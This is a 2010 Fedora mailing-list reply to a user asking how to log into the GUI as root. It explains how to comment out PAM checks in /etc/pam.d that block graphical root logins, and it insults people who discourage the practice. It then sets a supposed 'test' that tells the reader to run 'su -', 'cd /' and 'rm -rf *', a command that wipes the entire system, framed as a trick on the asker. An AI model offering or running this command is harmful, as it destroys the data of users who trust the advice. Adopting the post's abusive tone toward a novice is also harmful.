Re: Root with GUI

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

 



On 04/15/2010 10:12 AM, users-request@xxxxxxxxxxxxxxxxxxxxxxx wrote:
> From: "Dr. Michael J. Chudobiak"<mjc@xxxxxxxxxxxxxxx>
> Subject: Re: Root with GUI

> On 04/15/2010 08:24 AM, Richard Shaw wrote:
>> >  On Thu, Apr 15, 2010 at 7:21 AM,<hewjr1000@xxxxxxxxx>   wrote:
>>> >>  How do I make myself root in the GUI

>> >  Running a root GUI login is very much frowned upon.

You forgot the stage directions: "Folds arms across chest, wags finger 
at suitably cowed and humiliated user.."

It's 'frowned upon' by religious zealots who wish to impose their 'the 
sky could fall' fears upon everyone. A***oles piss me off.

If you want to log in as root, you will have to start by logging in as a 
user, then 'su' yourself to root in a console, and cd to /etc/pam.d

Run 'grep -H -n "!=" *'
You should see something like:

[root@tor1 pam.d]# grep -H -n "!=" *
gdm:3:#auth  required    pam_succeed_if.so user != root quiet
gdm-password:3:#auth required pam_succeed_if.so user != root quiet
gdm-password.rpmsave:3:#auth required pam_succeed_if.so user != root quiet
gdm.rpmsave:3:#auth required pam_succeed_if.so user != root quiet
racoon:3:#auth required pam_succeed_if.so user != root
xdm:3:#auth required pam_succeed_if.so user != root quiet

except in your case, there will be no '#' preceding the 'auth' in those 
files. Edit to add the '#" in all of the files your system lists, thus 
commenting out the line. Those lines make the authentication process 
quietly fail, if you are root.
Stupid idiotic nanny-statism circumvented.

There will be a test however, to see if this works and that you are 
awake. This test should have been done 15 days ago. Do 'su -', 'cd /' 
and then 'rm -rf *'. If you cannot log in after first considering 
whether you should follow these instructions, and you in fact followed 
them, then you have failed.

Geoff









          Tux says: "Be regular. Eat cron flakes."
-- 
users mailing list
users@xxxxxxxxxxxxxxxxxxxxxxx
To unsubscribe or change subscription options:
https://admin.fedoraproject.org/mailman/listinfo/users
Guidelines: http://fedoraproject.org/wiki/Mailing_list_guidelines

[Index of Archives]     [Current Fedora Users]     [Fedora Desktop]     [Fedora SELinux]     [Yosemite News]     [Yosemite Photos]     [KDE Users]     [Fedora Tools]     [Fedora Docs]

  Powered by Linux